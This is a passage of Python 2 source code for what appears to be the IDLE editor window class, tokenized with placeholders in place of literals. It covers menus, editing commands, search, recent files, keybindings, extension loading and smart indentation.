= sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' <EOL> if iswin : <EOL> self . text . config ( cursor = "<STR_LIT>" ) <EOL> rmenu . tk_popup ( event . x_root , event . y_root ) <EOL> if iswin : <EOL> self . text . config ( cursor = "<STR_LIT>" ) <EOL> rmenu_specs = [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] <EOL> def make_rmenu ( self ) : <EOL> rmenu = Menu ( self . text , tearoff = <NUM_LIT:0> ) <EOL> for label , eventname in self . rmenu_specs : <EOL> def command ( text = self . text , eventname = eventname ) : <EOL> text . event_generate ( eventname ) <EOL> rmenu . add_command ( label = label , command = command ) <EOL> self . rmenu = rmenu <EOL> def about_dialog ( self , event = None ) : <EOL> aboutDialog . AboutDialog ( self . top , '<STR_LIT>' ) <EOL> def config_dialog ( self , event = None ) : <EOL> configDialog . ConfigDialog ( self . top , '<STR_LIT>' ) <EOL> def help_dialog ( self , event = None ) : <EOL> fn = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> textView . TextViewer ( self . top , '<STR_LIT>' , fn ) <EOL> def python_docs ( self , event = None ) : <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> os . startfile ( self . help_url ) <EOL> else : <EOL> webbrowser . open ( self . help_url ) <EOL> return "<STR_LIT>" <EOL> def cut ( self , event ) : <EOL> self . text . event_generate ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def copy ( self , event ) : <EOL> if not self . text . tag_ranges ( "<STR_LIT>" ) : <EOL> return <EOL> self . text . event_generate ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def paste ( self , event ) : <EOL> self . text . event_generate ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def select_all ( self , event = None ) : <EOL> self . text . tag_add ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT>" ) <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT:1.0>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> def remove_selection ( self , event = None ) : <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . see ( "<STR_LIT>" ) <EOL> def move_at_edge_if_selection ( self , edge_index ) : <EOL> """<STR_LIT>""" <EOL> self_text_index = self . text . index <EOL> self_text_mark_set = self . text . mark_set <EOL> edges_table = ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def move_at_edge ( event ) : <EOL> if ( event . state & <NUM_LIT:5> ) == <NUM_LIT:0> : <EOL> try : <EOL> self_text_index ( "<STR_LIT>" ) <EOL> self_text_mark_set ( "<STR_LIT>" , edges_table [ edge_index ] ) <EOL> except TclError : <EOL> pass <EOL> return move_at_edge <EOL> def del_word_left ( self , event ) : <EOL> self . text . event_generate ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" <EOL> def del_word_right ( self , event ) : <EOL> self . text . event_generate ( '<STR_LIT>' ) <EOL> return "<STR_LIT>" <EOL> def find_event ( self , event ) : <EOL> SearchDialog . find ( self . text ) <EOL> return "<STR_LIT>" <EOL> def find_again_event ( self , event ) : <EOL> SearchDialog . find_again ( self . text ) <EOL> return "<STR_LIT>" <EOL> def find_selection_event ( self , event ) : <EOL> SearchDialog . find_selection ( self . text ) <EOL> return "<STR_LIT>" <EOL> def find_in_files_event ( self , event ) : <EOL> GrepDialog . grep ( self . text , self . io , self . flist ) <EOL> return "<STR_LIT>" <EOL> def replace_event ( self , event ) : <EOL> ReplaceDialog . replace ( self . text ) <EOL> return "<STR_LIT>" <EOL> def goto_line_event ( self , event ) : <EOL> text = self . text <EOL> lineno = tkSimpleDialog . askinteger ( "<STR_LIT>" , <EOL> "<STR_LIT>" , parent = text ) <EOL> if lineno is None : <EOL> return "<STR_LIT>" <EOL> if lineno <= <NUM_LIT:0> : <EOL> text . bell ( ) <EOL> return "<STR_LIT>" <EOL> text . mark_set ( "<STR_LIT>" , "<STR_LIT>" % lineno ) <EOL> text . see ( "<STR_LIT>" ) <EOL> def open_module ( self , event = None ) : <EOL> try : <EOL> name = self . text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> except TclError : <EOL> name = "<STR_LIT>" <EOL> else : <EOL> name = name . strip ( ) <EOL> name = tkSimpleDialog . askstring ( "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> parent = self . text , initialvalue = name ) <EOL> if name : <EOL> name = name . strip ( ) <EOL> if not name : <EOL> return <EOL> try : <EOL> ( f , file , ( suffix , mode , type ) ) = _find_module ( name ) <EOL> except ( NameError , ImportError ) , msg : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , str ( msg ) , parent = self . text ) <EOL> return <EOL> if type != imp . PY_SOURCE : <EOL> tkMessageBox . showerror ( "<STR_LIT>" , <EOL> "<STR_LIT>" % name , parent = self . text ) <EOL> return <EOL> if f : <EOL> f . close ( ) <EOL> if self . flist : <EOL> self . flist . open ( file ) <EOL> else : <EOL> self . io . loadfile ( file ) <EOL> def open_class_browser ( self , event = None ) : <EOL> filename = self . io . filename <EOL> if not filename : <EOL> tkMessageBox . showerror ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> master = self . text ) <EOL> self . text . focus_set ( ) <EOL> return None <EOL> head , tail = os . path . split ( filename ) <EOL> base , ext = os . path . splitext ( tail ) <EOL> import ClassBrowser <EOL> ClassBrowser . ClassBrowser ( self . flist , base , [ head ] ) <EOL> def open_path_browser ( self , event = None ) : <EOL> import PathBrowser <EOL> PathBrowser . PathBrowser ( self . flist ) <EOL> def gotoline ( self , lineno ) : <EOL> if lineno is not None and lineno > <NUM_LIT:0> : <EOL> self . text . mark_set ( "<STR_LIT>" , "<STR_LIT>" % lineno ) <EOL> self . text . tag_remove ( "<STR_LIT>" , "<STR_LIT:1.0>" , "<STR_LIT:end>" ) <EOL> self . text . tag_add ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . center ( ) <EOL> def ispythonsource ( self , filename ) : <EOL> if not filename or os . path . isdir ( filename ) : <EOL> return True <EOL> base , ext = os . path . splitext ( os . path . basename ( filename ) ) <EOL> if os . path . normcase ( ext ) in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> return True <EOL> try : <EOL> f = open ( filename ) <EOL> line = f . readline ( ) <EOL> f . close ( ) <EOL> except IOError : <EOL> return False <EOL> return line . startswith ( '<STR_LIT>' ) and line . find ( '<STR_LIT>' ) >= <NUM_LIT:0> <EOL> def close_hook ( self ) : <EOL> if self . flist : <EOL> self . flist . close_edit ( self ) <EOL> def set_close_hook ( self , close_hook ) : <EOL> self . close_hook = close_hook <EOL> def filename_change_hook ( self ) : <EOL> if self . flist : <EOL> self . flist . filename_changed_edit ( self ) <EOL> self . saved_change_hook ( ) <EOL> self . top . update_windowlist_registry ( self ) <EOL> if self . ispythonsource ( self . io . filename ) : <EOL> self . addcolorizer ( ) <EOL> else : <EOL> self . rmcolorizer ( ) <EOL> def addcolorizer ( self ) : <EOL> if self . color : <EOL> return <EOL> self . per . removefilter ( self . undo ) <EOL> self . color = self . ColorDelegator ( ) <EOL> self . per . insertfilter ( self . color ) <EOL> self . per . insertfilter ( self . undo ) <EOL> def rmcolorizer ( self ) : <EOL> if not self . color : <EOL> return <EOL> self . color . removecolors ( ) <EOL> self . per . removefilter ( self . undo ) <EOL> self . per . removefilter ( self . color ) <EOL> self . color = None <EOL> self . per . insertfilter ( self . undo ) <EOL> def ResetColorizer ( self ) : <EOL> "<STR_LIT>" <EOL> if self . color : <EOL> self . color = self . ColorDelegator ( ) <EOL> self . per . insertfilter ( self . color ) <EOL> theme = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:name>' ) <EOL> self . text . config ( idleConf . GetHighlight ( theme , "<STR_LIT>" ) ) <EOL> def ResetFont ( self ) : <EOL> "<STR_LIT>" <EOL> fontWeight = '<STR_LIT>' <EOL> if idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , type = '<STR_LIT:bool>' ) : <EOL> fontWeight = '<STR_LIT>' <EOL> self . text . config ( font = ( idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> fontWeight ) ) <EOL> def RemoveKeybindings ( self ) : <EOL> "<STR_LIT>" <EOL> self . Bindings . default_keydefs = keydefs = idleConf . GetCurrentKeySet ( ) <EOL> for event , keylist in keydefs . items ( ) : <EOL> self . text . event_delete ( event , * keylist ) <EOL> for extensionName in self . get_standard_extension_names ( ) : <EOL> xkeydefs = idleConf . GetExtensionBindings ( extensionName ) <EOL> if xkeydefs : <EOL> for event , keylist in xkeydefs . items ( ) : <EOL> self . text . event_delete ( event , * keylist ) <EOL> def ApplyKeybindings ( self ) : <EOL> "<STR_LIT>" <EOL> self . Bindings . default_keydefs = keydefs = idleConf . GetCurrentKeySet ( ) <EOL> self . apply_bindings ( ) <EOL> for extensionName in self . get_standard_extension_names ( ) : <EOL> xkeydefs = idleConf . GetExtensionBindings ( extensionName ) <EOL> if xkeydefs : <EOL> self . apply_bindings ( xkeydefs ) <EOL> menuEventDict = { } <EOL> for menu in self . Bindings . menudefs : <EOL> menuEventDict [ menu [ <NUM_LIT:0> ] ] = { } <EOL> for item in menu [ <NUM_LIT:1> ] : <EOL> if item : <EOL> menuEventDict [ menu [ <NUM_LIT:0> ] ] [ prepstr ( item [ <NUM_LIT:0> ] ) [ <NUM_LIT:1> ] ] = item [ <NUM_LIT:1> ] <EOL> for menubarItem in self . menudict . keys ( ) : <EOL> menu = self . menudict [ menubarItem ] <EOL> end = menu . index ( END ) + <NUM_LIT:1> <EOL> for index in range ( <NUM_LIT:0> , end ) : <EOL> if menu . type ( index ) == '<STR_LIT>' : <EOL> accel = menu . entrycget ( index , '<STR_LIT>' ) <EOL> if accel : <EOL> itemName = menu . entrycget ( index , '<STR_LIT:label>' ) <EOL> event = '<STR_LIT>' <EOL> if menuEventDict . has_key ( menubarItem ) : <EOL> if menuEventDict [ menubarItem ] . has_key ( itemName ) : <EOL> event = menuEventDict [ menubarItem ] [ itemName ] <EOL> if event : <EOL> accel = get_accelerator ( keydefs , event ) <EOL> menu . entryconfig ( index , accelerator = accel ) <EOL> def set_notabs_indentwidth ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . usetabs : <EOL> self . indentwidth = idleConf . GetOption ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> type = '<STR_LIT:int>' ) <EOL> def reset_help_menu_entries ( self ) : <EOL> "<STR_LIT>" <EOL> help_list = idleConf . GetAllExtraHelpSourcesList ( ) <EOL> helpmenu = self . menudict [ '<STR_LIT>' ] <EOL> helpmenu_length = helpmenu . index ( END ) <EOL> if helpmenu_length > self . base_helpmenu_length : <EOL> helpmenu . delete ( ( self . base_helpmenu_length + <NUM_LIT:1> ) , helpmenu_length ) <EOL> if help_list : <EOL> helpmenu . add_separator ( ) <EOL> for entry in help_list : <EOL> cmd = self . __extra_help_callback ( entry [ <NUM_LIT:1> ] ) <EOL> helpmenu . add_command ( label = entry [ <NUM_LIT:0> ] , command = cmd ) <EOL> self . menudict [ '<STR_LIT>' ] = helpmenu <EOL> def __extra_help_callback ( self , helpfile ) : <EOL> "<STR_LIT>" <EOL> def display_extra_help ( helpfile = helpfile ) : <EOL> if not helpfile . startswith ( ( '<STR_LIT>' , '<STR_LIT:http>' ) ) : <EOL> url = os . path . normpath ( helpfile ) <EOL> if sys . platform [ : <NUM_LIT:3> ] == '<STR_LIT>' : <EOL> os . startfile ( helpfile ) <EOL> else : <EOL> webbrowser . open ( helpfile ) <EOL> return display_extra_help <EOL> def update_recent_files_list ( self , new_file = None ) : <EOL> "<STR_LIT>" <EOL> rf_list = [ ] <EOL> if os . path . exists ( self . recent_files_path ) : <EOL> rf_list_file = open ( self . recent_files_path , '<STR_LIT:r>' ) <EOL> try : <EOL> rf_list = rf_list_file . readlines ( ) <EOL> finally : <EOL> rf_list_file . close ( ) <EOL> if new_file : <EOL> new_file = os . path . abspath ( new_file ) + '<STR_LIT:\n>' <EOL> if new_file in rf_list : <EOL> rf_list . remove ( new_file ) <EOL> rf_list . insert ( <NUM_LIT:0> , new_file ) <EOL> bad_paths = [ ] <EOL> for path in rf_list : <EOL> if '<STR_LIT>' in path or not os . path . exists ( path [ <NUM_LIT:0> : - <NUM_LIT:1> ] ) : <EOL> bad_paths . append ( path ) <EOL> rf_list = [ path for path in rf_list if path not in bad_paths ] <EOL> ulchars = "<STR_LIT>" <EOL> rf_list = rf_list [ <NUM_LIT:0> : len ( ulchars ) ] <EOL> rf_file = open ( self . recent_files_path , '<STR_LIT:w>' ) <EOL> try : <EOL> rf_file . writelines ( rf_list ) <EOL> finally : <EOL> rf_file . close ( ) <EOL> for instance in self . top . instance_dict . keys ( ) : <EOL> menu = instance . recent_files_menu <EOL> menu . delete ( <NUM_LIT:1> , END ) <EOL> for i , file in zip ( count ( ) , rf_list ) : <EOL> file_name = file [ <NUM_LIT:0> : - <NUM_LIT:1> ] <EOL> ufile_name = self . _filename_to_unicode ( file_name ) <EOL> callback = instance . __recent_file_callback ( file_name ) <EOL> menu . add_command ( label = ulchars [ i ] + "<STR_LIT:U+0020>" + ufile_name , <EOL> command = callback , <EOL> underline = <NUM_LIT:0> ) <EOL> def __recent_file_callback ( self , file_name ) : <EOL> def open_recent_file ( fn_closure = file_name ) : <EOL> self . io . open ( editFile = fn_closure ) <EOL> return open_recent_file <EOL> def saved_change_hook ( self ) : <EOL> short = self . short_title ( ) <EOL> long = self . long_title ( ) <EOL> if short and long : <EOL> title = short + "<STR_LIT>" + long <EOL> elif short : <EOL> title = short <EOL> elif long : <EOL> title = long <EOL> else : <EOL> title = "<STR_LIT>" <EOL> icon = short or long or title <EOL> if not self . get_saved ( ) : <EOL> title = "<STR_LIT>" % title <EOL> icon = "<STR_LIT>" % icon <EOL> self . top . wm_title ( title ) <EOL> self . top . wm_iconname ( icon ) <EOL> def get_saved ( self ) : <EOL> return self . undo . get_saved ( ) <EOL> def set_saved ( self , flag ) : <EOL> self . undo . set_saved ( flag ) <EOL> def reset_undo ( self ) : <EOL> self . undo . reset_undo ( ) <EOL> def short_title ( self ) : <EOL> filename = self . io . filename <EOL> if filename : <EOL> filename = os . path . basename ( filename ) <EOL> return self . _filename_to_unicode ( filename ) <EOL> def long_title ( self ) : <EOL> return self . _filename_to_unicode ( self . io . filename or "<STR_LIT>" ) <EOL> def center_insert_event ( self , event ) : <EOL> self . center ( ) <EOL> def center ( self , mark = "<STR_LIT>" ) : <EOL> text = self . text <EOL> top , bot = self . getwindowlines ( ) <EOL> lineno = self . getlineno ( mark ) <EOL> height = bot - top <EOL> newtop = max ( <NUM_LIT:1> , lineno - height // <NUM_LIT:2> ) <EOL> text . yview ( float ( newtop ) ) <EOL> def getwindowlines ( self ) : <EOL> text = self . text <EOL> top = self . getlineno ( "<STR_LIT>" ) <EOL> bot = self . getlineno ( "<STR_LIT>" ) <EOL> if top == bot and text . winfo_height ( ) == <NUM_LIT:1> : <EOL> height = int ( text [ '<STR_LIT>' ] ) <EOL> bot = top + height - <NUM_LIT:1> <EOL> return top , bot <EOL> def getlineno ( self , mark = "<STR_LIT>" ) : <EOL> text = self . text <EOL> return int ( float ( text . index ( mark ) ) ) <EOL> def get_geometry ( self ) : <EOL> "<STR_LIT>" <EOL> geom = self . top . wm_geometry ( ) <EOL> m = re . match ( r"<STR_LIT>" , geom ) <EOL> tuple = ( map ( int , m . groups ( ) ) ) <EOL> return tuple <EOL> def close_event ( self , event ) : <EOL> self . close ( ) <EOL> def maybesave ( self ) : <EOL> if self . io : <EOL> if not self . get_saved ( ) : <EOL> if self . top . state ( ) != '<STR_LIT>' : <EOL> self . top . deiconify ( ) <EOL> self . top . lower ( ) <EOL> self . top . lift ( ) <EOL> return self . io . maybesave ( ) <EOL> def close ( self ) : <EOL> reply = self . maybesave ( ) <EOL> if str ( reply ) != "<STR_LIT>" : <EOL> self . _close ( ) <EOL> return reply <EOL> def _close ( self ) : <EOL> if self . io . filename : <EOL> self . update_recent_files_list ( new_file = self . io . filename ) <EOL> WindowList . unregister_callback ( self . postwindowsmenu ) <EOL> if self . close_hook : <EOL> self . close_hook ( ) <EOL> self . flist = None <EOL> colorizing = <NUM_LIT:0> <EOL> self . unload_extensions ( ) <EOL> self . io . close ( ) ; self . io = None <EOL> self . undo = None <EOL> if self . color : <EOL> colorizing = self . color . colorizing <EOL> doh = colorizing and self . top <EOL> self . color . close ( doh ) <EOL> self . text = None <EOL> self . tkinter_vars = None <EOL> self . per . close ( ) ; self . per = None <EOL> if not colorizing : <EOL> self . top . destroy ( ) <EOL> def load_extensions ( self ) : <EOL> self . extensions = { } <EOL> self . load_standard_extensions ( ) <EOL> def unload_extensions ( self ) : <EOL> for ins in self . extensions . values ( ) : <EOL> if hasattr ( ins , "<STR_LIT>" ) : <EOL> ins . close ( ) <EOL> self . extensions = { } <EOL> def load_standard_extensions ( self ) : <EOL> for name in self . get_standard_extension_names ( ) : <EOL> try : <EOL> self . load_extension ( name ) <EOL> except : <EOL> print "<STR_LIT>" , repr ( name ) <EOL> import traceback <EOL> traceback . print_exc ( ) <EOL> def get_standard_extension_names ( self ) : <EOL> return idleConf . GetExtensions ( editor_only = True ) <EOL> def load_extension ( self , name ) : <EOL> try : <EOL> mod = __import__ ( name , globals ( ) , locals ( ) , [ ] ) <EOL> except ImportError : <EOL> print "<STR_LIT>" , name <EOL> return <EOL> cls = getattr ( mod , name ) <EOL> keydefs = idleConf . GetExtensionBindings ( name ) <EOL> if hasattr ( cls , "<STR_LIT>" ) : <EOL> self . fill_menus ( cls . menudefs , keydefs ) <EOL> ins = cls ( self ) <EOL> self . extensions [ name ] = ins <EOL> if keydefs : <EOL> self . apply_bindings ( keydefs ) <EOL> for vevent in keydefs . keys ( ) : <EOL> methodname = vevent . replace ( "<STR_LIT:->" , "<STR_LIT:_>" ) <EOL> while methodname [ : <NUM_LIT:1> ] == '<STR_LIT:<>' : <EOL> methodname = methodname [ <NUM_LIT:1> : ] <EOL> while methodname [ - <NUM_LIT:1> : ] == '<STR_LIT:>>' : <EOL> methodname = methodname [ : - <NUM_LIT:1> ] <EOL> methodname = methodname + "<STR_LIT>" <EOL> if hasattr ( ins , methodname ) : <EOL> self . text . bind ( vevent , getattr ( ins , methodname ) ) <EOL> def apply_bindings ( self , keydefs = None ) : <EOL> if keydefs is None : <EOL> keydefs = self . Bindings . default_keydefs <EOL> text = self . text <EOL> text . keydefs = keydefs <EOL> for event , keylist in keydefs . items ( ) : <EOL> if keylist : <EOL> text . event_add ( event , * keylist ) <EOL> def fill_menus ( self , menudefs = None , keydefs = None ) : <EOL> """<STR_LIT>""" <EOL> if menudefs is None : <EOL> menudefs = self . Bindings . menudefs <EOL> if keydefs is None : <EOL> keydefs = self . Bindings . default_keydefs <EOL> menudict = self . menudict <EOL> text = self . text <EOL> for mname , entrylist in menudefs : <EOL> menu = menudict . get ( mname ) <EOL> if not menu : <EOL> continue <EOL> for entry in entrylist : <EOL> if not entry : <EOL> menu . add_separator ( ) <EOL> else : <EOL> label , eventname = entry <EOL> checkbutton = ( label [ : <NUM_LIT:1> ] == '<STR_LIT:!>' ) <EOL> if checkbutton : <EOL> label = label [ <NUM_LIT:1> : ] <EOL> underline , label = prepstr ( label ) <EOL> accelerator = get_accelerator ( keydefs , eventname ) <EOL> def command ( text = text , eventname = eventname ) : <EOL> text . event_generate ( eventname ) <EOL> if checkbutton : <EOL> var = self . get_var_obj ( eventname , BooleanVar ) <EOL> menu . add_checkbutton ( label = label , underline = underline , <EOL> command = command , accelerator = accelerator , <EOL> variable = var ) <EOL> else : <EOL> menu . add_command ( label = label , underline = underline , <EOL> command = command , <EOL> accelerator = accelerator ) <EOL> def getvar ( self , name ) : <EOL> var = self . get_var_obj ( name ) <EOL> if var : <EOL> value = var . get ( ) <EOL> return value <EOL> else : <EOL> raise NameError , name <EOL> def setvar ( self , name , value , vartype = None ) : <EOL> var = self . get_var_obj ( name , vartype ) <EOL> if var : <EOL> var . set ( value ) <EOL> else : <EOL> raise NameError , name <EOL> def get_var_obj ( self , name , vartype = None ) : <EOL> var = self . tkinter_vars . get ( name ) <EOL> if not var and vartype : <EOL> self . tkinter_vars [ name ] = var = vartype ( self . text ) <EOL> return var <EOL> def is_char_in_string ( self , text_index ) : <EOL> if self . color : <EOL> return self . text . tag_prevrange ( "<STR_LIT>" , text_index ) or "<STR_LIT>" in self . text . tag_names ( text_index ) <EOL> else : <EOL> return <NUM_LIT:1> <EOL> def get_selection_indices ( self ) : <EOL> try : <EOL> first = self . text . index ( "<STR_LIT>" ) <EOL> last = self . text . index ( "<STR_LIT>" ) <EOL> return first , last <EOL> except TclError : <EOL> return None , None <EOL> def get_tabwidth ( self ) : <EOL> current = self . text [ '<STR_LIT>' ] or TK_TABWIDTH_DEFAULT <EOL> return int ( current ) <EOL> def set_tabwidth ( self , newtabwidth ) : <EOL> text = self . text <EOL> if self . get_tabwidth ( ) != newtabwidth : <EOL> pixels = text . tk . call ( "<STR_LIT>" , "<STR_LIT>" , text [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" , text . master , <EOL> "<STR_LIT:n>" * newtabwidth ) <EOL> text . configure ( tabs = pixels ) <EOL> def set_indentation_params ( self , ispythonsource , guess = True ) : <EOL> if guess and ispythonsource : <EOL> i = self . guess_indent ( ) <EOL> if <NUM_LIT:2> <= i <= <NUM_LIT:8> : <EOL> self . indentwidth = i <EOL> if self . indentwidth != self . tabwidth : <EOL> self . usetabs = False <EOL> self . set_tabwidth ( self . tabwidth ) <EOL> def smart_backspace_event ( self , event ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> if first and last : <EOL> text . delete ( first , last ) <EOL> text . mark_set ( "<STR_LIT>" , first ) <EOL> return "<STR_LIT>" <EOL> chars = text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if chars == '<STR_LIT>' : <EOL> if text . compare ( "<STR_LIT>" , "<STR_LIT:>>" , "<STR_LIT:1.0>" ) : <EOL> text . delete ( "<STR_LIT>" ) <EOL> else : <EOL> text . bell ( ) <EOL> return "<STR_LIT>" <EOL> if chars [ - <NUM_LIT:1> ] not in "<STR_LIT>" : <EOL> text . delete ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> tabwidth = self . tabwidth <EOL> have = len ( chars . expandtabs ( tabwidth ) ) <EOL> assert have > <NUM_LIT:0> <EOL> want = ( ( have - <NUM_LIT:1> ) // self . indentwidth ) * self . indentwidth <EOL> last_line_of_prompt = sys . ps1 . split ( '<STR_LIT:\n>' ) [ - <NUM_LIT:1> ] <EOL> ncharsdeleted = <NUM_LIT:0> <EOL> while <NUM_LIT:1> : <EOL> if chars == last_line_of_prompt : <EOL> break <EOL> chars = chars [ : - <NUM_LIT:1> ] <EOL> ncharsdeleted = ncharsdeleted + <NUM_LIT:1> <EOL> have = len ( chars . expandtabs ( tabwidth ) ) <EOL> if have <= want or chars [ - <NUM_LIT:1> ] not in "<STR_LIT>" : <EOL> break <EOL> text . undo_block_start ( ) <EOL> text . delete ( "<STR_LIT>" % ncharsdeleted , "<STR_LIT>" ) <EOL> if have < want : <EOL> text . insert ( "<STR_LIT>" , '<STR_LIT:U+0020>' * ( want - have ) ) <EOL> text . undo_block_stop ( ) <EOL> return "<STR_LIT>" <EOL> def smart_indent_event ( self , event ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> text . undo_block_start ( ) <EOL> try : <EOL> if first and last : <EOL> if index2line ( first ) != index2line ( last ) : <EOL> return self . indent_region_event ( event ) <EOL> text . delete ( first , last ) <EOL> text . mark_set ( "<STR_LIT>" , first ) <EOL> prefix = text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> raw , effective = classifyws ( prefix , self . tabwidth ) <EOL> if raw == len ( prefix ) : <EOL> self . reindent_to ( effective + self . indentwidth ) <EOL> else : <EOL> if self . usetabs : <EOL> pad = '<STR_LIT:\t>' <EOL> else : <EOL> effective = len ( prefix . expandtabs ( self . tabwidth ) ) <EOL> n = self . indentwidth <EOL> pad = '<STR_LIT:U+0020>' * ( n - effective % n ) <EOL> text . insert ( "<STR_LIT>" , pad ) <EOL> text . see ( "<STR_LIT>" ) <EOL> return "<STR_LIT>" <EOL> finally : <EOL> text . undo_block_stop ( ) <EOL> def newline_and_indent_event ( self , event ) : <EOL> text = self . text <EOL> first , last = self . get_selection_indices ( ) <EOL> text . undo_block_start ( ) <EOL> try : <EOL> if first and last : <EOL> text . delete ( first , last ) <EOL> text . mark_set ( "<STR_LIT>" , first ) <EOL> line = text . get ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> i , n = <NUM_LIT:0> , len ( line ) <EOL> while i < n and line [ i ] in "<STR_LIT>" : <EOL> i = i + <NUM_LIT:1> <EOL> if i == n : <EOL> text . insert ( "<STR_LIT>" , '<STR_LIT:\n>' ) <EOL> return "<STR_LIT>" <EOL> indent = line [ : i ] <EOL> i = <NUM_LIT:0> <EOL> last_line_of_prompt = sys . ps1 . split ( '<STR_LIT:\n>' ) [ - <NUM_LIT:1> ] <EOL> while line and line [ - <NUM_LIT:1> ] in "<STR_LIT>" and line != last_line_of_prompt : <EOL> line = line [ : - <NUM_LIT:1> ] <EOL> i = i + <NUM_LIT:1> <EOL> if i : <EOL> text . delete ( "<STR_LIT>" % i , "<STR_LIT>" ) <EOL> while text . get ( "<STR_LIT>" ) in "<STR_LIT>" : <EOL> text . delete ( "<STR_LIT>" ) <EOL> text . insert ( "<STR_LIT>" , '<STR_LIT:\n>' ) <EOL> lno = index2line ( text . index ( '<STR_LIT>' ) ) <EOL> y = PyParse . Parser ( self . indentwidth , self . tabwidth ) <EOL> if not self . context_use_ps1 : <EOL> for context in self . num_context_lines : <EOL> startat = max ( lno - context , <NUM_LIT:1> ) <EOL> startatindex = ` startat ` + "<STR_LIT>" <EOL> rawtext = text . get ( startatindex , "<STR_LIT>" ) <EOL> y . set_str ( rawtext ) <EOL> bod = y . find_good_parse_start ( <EOL> self . context_use_ps1 , <EOL> self . _build_char_in_string_func ( startatindex ) ) <EOL> if bod is not None or startat == <NUM_LIT:1> : <EOL> break <EOL> y . set_lo ( bod or <NUM_LIT:0> ) <EOL> else : <EOL> r = text . tag_prevrange ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> if r : <EOL> startatindex = r [ <NUM_LIT:1> ] <EOL> else : <EOL> startatindex = "<STR_LIT:1.0>" <EOL> rawtext = text . get ( startatindex , "<STR_LIT>" ) <EOL> y . set_str ( rawtext ) <EOL> y . set_lo ( <NUM_LIT:0> ) <EOL> c = y . get_continuation_type ( ) <EOL> if c != PyParse . C_NONE : <EOL> if c == PyParse . C_STRING_FIRST_LINE : <EOL> pass <EOL> elif c == PyParse . C_STRING_NEXT_LINES : <EOL> text . insert ( "<STR_LIT>" , indent ) <EOL> elif c == PyParse . C_BRACKET : <EOL> self . reindent_to ( y . compute_bracket_indent ( ) ) <EOL> elif c == PyParse . C_BACKSLASH : <EOL> if y . get_num_lines_in_stmt ( ) > <NUM_LIT:1> : <EOL> text . insert ( "<STR_LIT>" , indent ) <EOL> else : <EOL> self . reindent_to ( y . compute_backslash_indent ( ) ) <EOL> else : <EOL> assert <NUM_LIT:0> , "<STR_LIT>" % ( c , ) <EOL> return "<STR_LIT>" <EOL> indent = y . get_base_indent_string ( ) <EOL> text . insert ( "<STR_LIT>" , indent ) <EOL> if y . is_block_opener ( ) : <EOL> self . smart_indent_event ( event ) <EOL> elif indent and y . is_block_closer ( ) : <EOL> self . smart_backspace_event ( event ) <EOL> return "<STR_LIT>" <EOL> finally : <EOL> text . see ( "<STR_LIT>" ) <EOL> text . undo_block_stop ( ) <EOL> def _build_char_in_string_func ( self , startindex ) : <EOL> def inner ( offset , _startindex = startindex , <EOL> _icis = self . is_char_in_string ) : <EOL> return _icis ( _startindex + "<STR_LIT>" % offset ) <EOL> return inner <EOL> def indent_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if line : <EOL> raw , effective = classifyws ( line , self . tabwidth ) <EOL> effective = effective + self . indentwidth <EOL> lines [ pos ] = self . _make_blanks ( effective ) + line [ raw : ] <EOL> self . set_region ( head , tail , chars , lines ) <EOL> return "<STR_LIT>" <EOL> def dedent_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if line : <EOL> raw , effective = classifyws ( line , self . tabwidth ) <EOL> effective = max ( effective - self . indentwidth , <NUM_LIT:0> ) <EOL> lines [ pos ] = self . _make_blanks ( effective ) + line [ raw : ] <EOL> self . set_region ( head , tail , chars , lines ) <EOL> return "<STR_LIT>" <EOL> def comment_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> for pos in range ( len ( lines ) - <NUM_LIT:1> ) : <EOL> line = lines [ pos ] <EOL> lines [ pos ] = '<STR_LIT>' + line <EOL> self . set_region ( head , tail , chars , lines ) <EOL> def uncomment_region_event ( self , event ) : <EOL> head , tail , chars , lines = self . get_region ( ) <EOL> for pos in range ( len ( lines ) ) : <EOL> line = lines [ pos ] <EOL> if not line : <EOL> continue <EOL> if line [ : <NUM_LIT:2> ] == '<STR_LIT>' : <EOL> line = line [ 